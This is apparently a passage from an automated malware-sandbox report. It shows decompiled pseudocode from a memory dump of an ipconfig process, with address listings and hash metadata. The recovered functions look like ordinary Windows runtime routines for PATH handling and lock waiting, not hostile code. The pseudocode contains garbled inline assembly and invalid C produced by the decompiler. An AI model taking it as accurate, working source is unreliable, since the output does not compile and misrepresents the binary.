							 *((intOrPtr*)(_t327 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x2f88478;
								 *_t327 = ((0 | _t309 == 0x02f88478) - 0x00000001 & 0xfffffffb) + 7;
								E02EDF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t335 = _t335 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E02F239F2(_t322);
									_t309 = _v32;
									_t322 = _t268;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t327 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t230 =  *(_v60 + _t291 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t291 * 4);
										 *(_t278 + 0x18) = _t322;
										_t234 =  *(_v60 + _t291 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M02EC2959))) {
												case 0:
													__ax =  *0x2f88488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E02EDF3E0(__edi,  *0x2f8848c, __ax & 0x0000ffff);
														__eax =  *0x2f88488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E02EDF3E0(_t322, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x2f88480 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f88484,  *0x2f88480 & 0x0000ffff);
													__eax =  *0x2f88480 & 0x0000ffff;
													__eax = ( *0x2f88480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E02EDF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E02EDF3E0(_t322, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t322 = _t322 + (_t263 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t322 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x2f8575c;
													__eflags = __ebx - 0x2f8575c;
													if(__ebx != 0x2f8575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E02EDF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x2f8575c;
														} while (__ebx != 0x2f8575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x2f88478 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f8847c,  *0x2f88478 & 0x0000ffff);
													__eax =  *0x2f88478 & 0x0000ffff;
													__eax = ( *0x2f88478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E02F239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x2f86e58 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f86e5c,  *0x2f86e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x2f86e58 & 0x0000ffff;
													__eax = ( *0x2f86e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t309 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t320 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M02EC2935))) {
							case 0:
								__ax =  *0x2f88488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E02EC2E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x2f88480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2f88480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E02EAEEF0(0x2f879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E02EAEB70(__ecx, 0x2f879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x2f87b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E02EAEB70(__ecx, 0x2f879a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t332;
										_pop(_t275);
										return E02EDB640(_t209, _t275, _v8 ^ _t332, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t272 = E02EC2E3E(_t270,  &_v36);
									_t287 = _v36;
									_v76 = _t272;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x2f85764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x2f88478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2f88478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x2f86e58 & 0x0000ffff;
								__eax = ( *0x2f86e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("in al, dx");
					asm("in al, dx");
					asm("daa");
					asm("in al, dx");
					asm("in al, dx");
					asm("in al, dx");
					asm("lock add dl, [eax+ebp+0x5b3502ec]");
					asm("lock add al, [edx]");
					_t337 = _t335 - _t332;
					asm("daa");
					asm("in al, dx");
					asm("in al, dx");
					asm("in al, dx");
					_t283 = 0x25;
					asm("lock add dh, [eax+ebp+0x5c3402ec]");
					asm("lock add cl, ah");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x2f6ff00);
					E02EED08C(_t283, _t322, _t327);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t330 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t299 = _t245 * 0xc;
							_v48 = _t299;
							__eflags = _t284 -  *((intOrPtr*)(_t299 + 0x2e71664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E02EDE5C0(_a8,  *((intOrPtr*)(_t299 + 0x2e71668)), _t284);
									_t337 = _t337 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t330 = E02F151BE(_t284,  *((intOrPtr*)(_v48 + 0x2e7166c)), _a16, _t323, _t330, __eflags, _a20, _a24);
										_v52 = _t330;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t330;
						__eflags = _t330;
						if(_t330 < 0) {
							__eflags = _t330 - 0xc0000100;
							if(_t330 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t330 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t330 = E02EC2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t330;
												__eflags = _t330 - 0xc0000100;
												if(_t330 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t250 = E02EA6600( *(_t311 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t330 = E02EC2C50(_t295, _a8, _t284, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t330;
											goto L69;
										}
									}
									goto L108;
								} else {
									E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t330 = _a24;
									_t257 = E02EC2AE4( &_v36, _a8, _t284, _a16, _a20, _t330);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E02EC2C50(_v36, _a8, _t284, _a16, _a20, _t330, 1);
									}
									_v8 = _t323;
									E02EC2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t330;
					}
					L70:
					return E02EED0D1(_t243);
				}
				L108:
			}



















































              0x02ec2584
              0x02ec2586
              0x02ec2590
              0x02ec2596
              0x02ec2597
              0x02ec2598
              0x02ec2599
              0x02ec259e
              0x02ec25a4
              0x02ec25a9
              0x02ec25ac
              0x02ec25ae
              0x02ec25b1
              0x02ec25b2
              0x02ec25b5
              0x02ec25b8
              0x02ec25bb
              0x02ec25bc
              0x02ec25bf
              0x02ec25c2
              0x02ec25c5
              0x02ec25c6
              0x02ec25cb
              0x02ec25ce
              0x02ec25d8
              0x02ec25db
              0x02ec25dd
              0x02ec25de
              0x02ec25e1
              0x02ec25e3
              0x02ec25e9
              0x02ec26da
              0x02ec26da
              0x02ec26dd
              0x02ec26e2
              0x02f05b56
              0x00000000
              0x02ec26e8
              0x02ec26f9
              0x02ec26fb
              0x02ec26fe
              0x02ec2700
              0x02f05b60
              0x00000000
              0x02ec2706
              0x02ec2706
              0x02ec270a
              0x02ec270a
              0x02ec270d
              0x02ec2713
              0x02ec2716
              0x02ec2718
              0x02ec271c
              0x02ec271e
              0x02f05b6c
              0x02f05b6f
              0x02f05b7f
              0x02f05b89
              0x02f05b8e
              0x02f05b93
              0x02f05b96
              0x02f05b9c
              0x02f05ba0
              0x02f05ba3
              0x02f05bab
              0x02f05bb0
              0x02f05bb3
              0x02f05bb3
              0x02f05ba3
              0x02ec2724
              0x02ec2726
              0x02ec2729
              0x02ec272c
              0x02ec279d
              0x02ec279d
              0x02ec27a0
              0x02ec27a2
              0x00000000
              0x02ec272e
              0x02ec272e
              0x02ec2731
              0x02ec2734
              0x02ec2734
              0x02ec2736
              0x02f05bc1
              0x02f05bc1
              0x02f05bc4
              0x00000000
              0x02f05bca
              0x02f05bca
              0x02f05bcd
              0x00000000
              0x02f05bd3
              0x00000000
              0x02f05bd3
              0x02f05bcd
              0x02ec273c
              0x02ec273c
              0x02ec2742
              0x02ec2747
              0x02ec274a
              0x02ec274d
              0x02ec2750
              0x00000000
              0x02ec2756
              0x02ec2756
              0x00000000
              0x02ec2902
              0x02ec2908
              0x02ec290b
              0x00000000
              0x02ec2911
              0x02ec291c
              0x02ec2921
              0x00000000
              0x02ec2921
              0x00000000
              0x00000000
              0x02ec2880
              0x02ec2887
              0x02ec288c
              0x00000000
              0x00000000
              0x02ec2805
              0x02ec280a
              0x02ec2814
              0x02ec2816
              0x00000000
              0x00000000
              0x02ec281e
              0x02ec2821
              0x02ec2823
              0x00000000
              0x02ec2829
              0x02ec2829
              0x02ec2831
              0x02ec283c
              0x02ec283e
              0x00000000
              0x02ec283e
              0x00000000
              0x00000000
              0x02ec284e
              0x02ec2850
              0x02ec2851
              0x02ec2854
              0x02ec2857
              0x02ec285a
              0x02ec285c
              0x02ec285d
              0x00000000
              0x00000000
              0x02ec275d
              0x02ec2761
              0x00000000
              0x02ec2767
              0x02ec276e
              0x02ec2773
              0x02ec2773
              0x02ec2776
              0x02ec2778
              0x02ec277e
              0x02ec277e
              0x02ec2781
              0x02ec2781
              0x02ec2783
              0x02ec2784
              0x00000000
              0x00000000
              0x02f05bd8
              0x02f05bde
              0x02f05be4
              0x02f05be6
              0x02f05be8
              0x02f05be9
              0x02f05bee
              0x02f05bf8
              0x02f05bff
              0x02f05c01
              0x02f05c04
              0x02f05c07
              0x02f05c0b
              0x02f05c0d
              0x02f05c0d
              0x02f05c15
              0x02f05c18
              0x02f05c1b
              0x02f05c1b
              0x02f05c1e
              0x00000000
              0x00000000
              0x02ec28c3
              0x02ec28c8
              0x02ec28d2
              0x02ec28d4
              0x02ec28d8
              0x02ec28db
              0x02f05c26
              0x02f05c28
              0x02f05c2d
              0x02f05c2d
              0x00000000
              0x00000000
              0x02f05c34
              0x02f05c36
              0x02f05c49
              0x02f05c4e
              0x02f05c54
              0x02f05c5b
              0x02f05c5d
              0x02f05c60
              0x02ec2788
              0x02ec2788
              0x02ec278b
              0x02ec278e
              0x02ec278e
              0x02ec278e
              0x02ec2791
              0x00000000
              0x00000000
              0x02ec2756
              0x02ec2750
              0x00000000
              0x02ec2794
              0x02ec2794
              0x02ec2795
              0x02ec2798
              0x02ec2798
              0x00000000
              0x02ec2734
              0x02ec272c
              0x02ec2700
              0x02ec25ef
              0x02ec25ef
              0x02ec25ef
              0x02ec25f2
              0x02ec25f8
              0x00000000
              0x00000000
              0x02ec25fe
              0x00000000
              0x02ec28e6
              0x02ec28ec
              0x02ec28ef
              0x02ec28f5
              0x02ec28f8
              0x02ec28f8
              0x00000000
              0x02ec28f8
              0x00000000
              0x00000000
              0x02ec2866
              0x02ec2866
              0x02ec2876
              0x02ec2879
              0x00000000
              0x00000000
              0x02ec27e0
              0x02ec27e7
              0x02ec27e9
              0x02ec27eb
              0x02f05afd
              0x00000000
              0x02f05afd
              0x00000000
              0x00000000
              0x02ec2633
              0x02ec2638
              0x02ec263b
              0x02ec263c
              0x02ec263e
              0x02ec2640
              0x02ec2642
              0x02ec2647
              0x02ec2649
              0x02ec264e
              0x02ec2650
              0x02ec2653
              0x02ec2659
              0x02ec26a2
              0x02ec26a7
              0x02ec26ac
              0x02ec26b2
              0x02f05b11
              0x02f05b15
              0x02f05b17
              0x00000000
              0x02ec26b8
              0x02ec26b8
              0x02ec26ba
              0x02ec27a6
              0x02ec27a6
              0x02ec27a9
              0x02ec27ab
              0x02ec27b9
              0x02ec27b9
              0x02ec27be
              0x02ec27c1
              0x02ec27c3
              0x02ec27c5
              0x02ec27c7
              0x02f05c74
              0x02f05c79
              0x02f05c79
              0x02ec27c7
              0x00000000
              0x02ec26c0
              0x02ec26c0
              0x02ec26c3
              0x02ec26c6
              0x02ec26c6
              0x02ec26c9
              0x02ec26c9
              0x00000000
              0x02ec26c9
              0x02ec26ba
              0x02ec265b
              0x02ec265b
              0x02ec265e
              0x02ec2667
              0x02ec266d
              0x02ec2677
              0x02ec267c
              0x02ec267f
              0x02ec2681
              0x02f05b49
              0x02f05b4e
              0x02ec27cd
              0x02ec27d0
              0x02ec27d1
              0x02ec27d2
              0x02ec27d4
              0x02ec27dd
              0x02ec2687
              0x02ec2687
              0x02ec268a
              0x02ec268b
              0x02ec268e
              0x02ec268f
              0x02ec2691
              0x02ec2696
              0x02ec2698
              0x02ec269d
              0x02ec269f
              0x00000000
              0x02ec269f
              0x02ec2681
              0x00000000
              0x00000000
              0x02ec2846
              0x00000000
              0x00000000
              0x02ec2605
              0x02ec260a
              0x02ec260c
              0x02ec2611
              0x02ec2616
              0x02ec2619
              0x02ec2619
              0x02ec261e
              0x00000000
              0x02ec2624
              0x02ec2627
              0x02ec2627
              0x00000000
              0x00000000
              0x02f05b1f
              0x00000000
              0x00000000
              0x02ec2894
              0x02ec289b
              0x02ec289d
              0x02ec28a1
              0x02f05b2b
              0x02f05b2e
              0x02f05b2e
              0x02ec28a7
              0x02ec28a9
              0x02f05b04
              0x02f05b09
              0x02f05b09
              0x02f05b09
              0x00000000
              0x00000000
              0x02f05b35
              0x02f05b3c
              0x02ec28fb
              0x02ec28fb
              0x02ec26cc
              0x02ec26cc
              0x02ec26d0
              0x00000000
              0x02ec26d2
              0x02ec26d2
              0x00000000
              0x02ec26d2
              0x00000000
              0x00000000
              0x02ec25fe
              0x02ec292d
              0x02ec2930
              0x02ec2935
              0x02ec2937
              0x02ec293b
              0x02ec293e
              0x02ec293f
              0x02ec2942
              0x02ec2947
              0x02ec294f
              0x02ec2957
              0x02ec295a
              0x02ec2962
              0x02ec2963
              0x02ec296b
              0x02ec296f
              0x02ec2972
              0x02ec2973
              0x02ec297b
              0x02ec297e
              0x02ec297f
              0x02ec2980
              0x02ec2981
              0x02ec2982
              0x02ec2983
              0x02ec2984
              0x02ec2985
              0x02ec2986
              0x02ec2987
              0x02ec2988
              0x02ec2989
              0x02ec298a
              0x02ec298b
              0x02ec298c
              0x02ec298d
              0x02ec298e
              0x02ec298f
              0x02ec2990
              0x02ec2992
              0x02ec2997
              0x02ec29a3
              0x02ec29a6
              0x02ec29ab
              0x02ec29ad
              0x02ec29b0
              0x02ec29b2
              0x02f05c80
              0x02ec29b8
              0x02ec29b8
              0x02ec29bb
              0x02ec29c0
              0x02ec29c5
              0x02ec29c6
              0x02ec29c6
              0x02ec29c9
              0x02ec29cb
              0x00000000
              0x00000000
              0x02ec29cd
              0x02ec29d0
              0x02ec29d9
              0x02ec29db
              0x02ec29dd
              0x02ec2a7f
              0x02ec2a84
              0x02ec2a87
              0x02ec2a89
              0x02f05ca1
              0x02f05ca3
              0x00000000
              0x02ec2a8f
              0x02ec2a8f
              0x00000000
              0x02ec2a8f
              0x00000000
              0x02ec29e3
              0x02ec29e3
              0x02ec29e3
              0x00000000
              0x02ec29e3
              0x02ec29dd
              0x00000000
              0x02ec29db
              0x02ec29e6
              0x02ec29e9
              0x02ec29eb
              0x02ec29ed
              0x02ec29f3
              0x02ec29f5
              0x02ec29f8
              0x02ec29fa
              0x02ec2a97
              0x02ec2a9a
              0x02ec2a9d
              0x02ec2add
              0x00000000
              0x02ec2a9f
              0x02ec2aa2
              0x02ec2aa5
              0x02ec2aa8
              0x02ec2aab
              0x02f05cab
              0x02f05caf
              0x02f05cc5
              0x02f05cda
              0x02f05cdc
              0x02f05cdf
              0x02f05ce5
              0x00000000
              0x02f05ceb
              0x02f05ced
              0x02f05cee
              0x00000000
              0x02f05cee
              0x02f05cb1
              0x02f05cb4
              0x02f05cb9
              0x02f05cbb
              0x00000000
              0x02f05cbd
              0x02f05cbd
              0x00000000
              0x02f05cbd
              0x02f05cbb
              0x02ec2ab1
              0x02ec2ab1
              0x02ec2ac4
              0x02ec2ac6
              0x02ec2ac6
              0x00000000
              0x02ec2ac6
              0x02ec2aab
              0x00000000
              0x02ec2a00
              0x02ec2a09
              0x02ec2a0e
              0x02ec2a21
              0x02ec2a24
              0x02ec2a35
              0x02ec2a3a
              0x02ec2a3d
              0x02ec2a42
              0x02ec2a59
              0x02ec2a59
              0x02ec2a5c
              0x02ec2a5f
              0x02ec2a5f
              0x02ec29fa
              0x02ec29f3
              0x02ec2a64
              0x02ec2a64
              0x02ec2a6b
              0x02ec2a6b
              0x02ec2a6d
              0x02ec2a72
              0x02ec2a72
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: PATH
              • API String ID: 0-1036084923
              • Opcode ID: 617ff719e6469694a2a414499b98a3fe4856264bd7042efcfd0711b6739d8592
              • Instruction ID: 6f4e0a7d7c94e81c431e6c86e613c1ff1a15ffcaea44d67a4a9b3bef6b38f58c
              • Opcode Fuzzy Hash: 617ff719e6469694a2a414499b98a3fe4856264bd7042efcfd0711b6739d8592
              • Instruction Fuzzy Hash: 8FC1AFB1E80219DBCB15DF98D990BEEF7B1FF48744F64902DEA01AB250D774A842CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E92D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
              Download Yara Rule
              C-Code - Quality: 63%
              			E02E92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x2f85350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x2f87bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E02ED97C0();
				}
				if( *0x2f879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x2f879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E02EC1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E02EB7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E02F2FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E02ED9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E02ECE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L02EEDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x2f86901;
								_push(_t109);
								_v52 = _t98;
								if( *0x2f86901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E02ED9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E02ED95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E02EB7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E02EB7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E02F17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E02F2FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x2f85350;
							if(_t109 != 0x2f85350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E02F2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E02F25720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































              0x02e92d8a
              0x02e92d8a
              0x02e92d92
              0x02e92d96
              0x02e92d9e
              0x02e92da0
              0x02e92da3
              0x02e92da5
              0x02e92da8
              0x02e92dab
              0x02e92db2
              0x02eef9aa
              0x02eef9ab
              0x02eef9ae
